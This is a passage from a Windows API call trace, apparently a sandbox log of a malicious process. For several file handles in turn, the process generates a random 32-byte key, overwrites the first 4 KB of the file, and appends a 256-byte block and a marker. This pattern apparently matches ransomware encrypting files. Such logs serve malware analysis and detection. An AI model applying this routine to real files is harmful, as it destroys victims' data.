out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.344] GetProcessHeap () returned 0x4f10000 [0085.344] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.344] GetProcessHeap () returned 0x4f10000 [0085.344] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.344] GetProcessHeap () returned 0x4f10000 [0085.344] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.344] CloseHandle (hObject=0x9bc) returned 1 [0085.345] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 145 [0085.345] SetFilePointerEx (in: hFile=0x9c0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.345] ReadFile (in: hFile=0x9c0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.346] SetFilePointerEx (in: hFile=0x9c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.346] GetProcessHeap () returned 0x4f10000 [0085.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.346] GetProcessHeap () returned 0x4f10000 [0085.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.346] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.346] GetProcessHeap () returned 0x4f10000 [0085.346] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.346] ReadFile (in: hFile=0x9c0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.424] SetFilePointerEx (in: hFile=0x9c0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.424] WriteFile (in: hFile=0x9c0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.424] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.424] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.425] GetProcessHeap () returned 0x4f10000 [0085.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.426] GetProcessHeap () returned 0x4f10000 [0085.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.427] GetProcessHeap () returned 0x4f10000 [0085.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.428] GetProcessHeap () returned 0x4f10000 [0085.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.429] GetProcessHeap () returned 0x4f10000 [0085.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.429] GetProcessHeap () returned 0x4f10000 [0085.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.429] GetProcessHeap () returned 0x4f10000 [0085.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.429] GetProcessHeap () returned 0x4f10000 [0085.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.429] SetFilePointerEx (in: hFile=0x9c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.429] WriteFile (in: hFile=0x9c0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.429] WriteFile (in: hFile=0x9c0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.429] GetProcessHeap () returned 0x4f10000 [0085.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.429] GetProcessHeap () returned 0x4f10000 [0085.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.429] GetProcessHeap () returned 0x4f10000 [0085.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.429] CloseHandle (hObject=0x9c0) returned 1 [0085.431] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 146 [0085.431] SetFilePointerEx (in: hFile=0x9c4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.431] ReadFile (in: hFile=0x9c4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.431] SetFilePointerEx (in: hFile=0x9c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.431] GetProcessHeap () returned 0x4f10000 [0085.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.431] GetProcessHeap () returned 0x4f10000 [0085.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.431] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.432] GetProcessHeap () returned 0x4f10000 [0085.432] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.432] ReadFile (in: hFile=0x9c4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.479] SetFilePointerEx (in: hFile=0x9c4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.479] WriteFile (in: hFile=0x9c4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.479] GetProcessHeap () returned 0x4f10000 [0085.479] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.479] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.480] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.480] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.481] GetProcessHeap () returned 0x4f10000 [0085.481] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.482] GetProcessHeap () returned 0x4f10000 [0085.482] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.483] GetProcessHeap () returned 0x4f10000 [0085.483] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 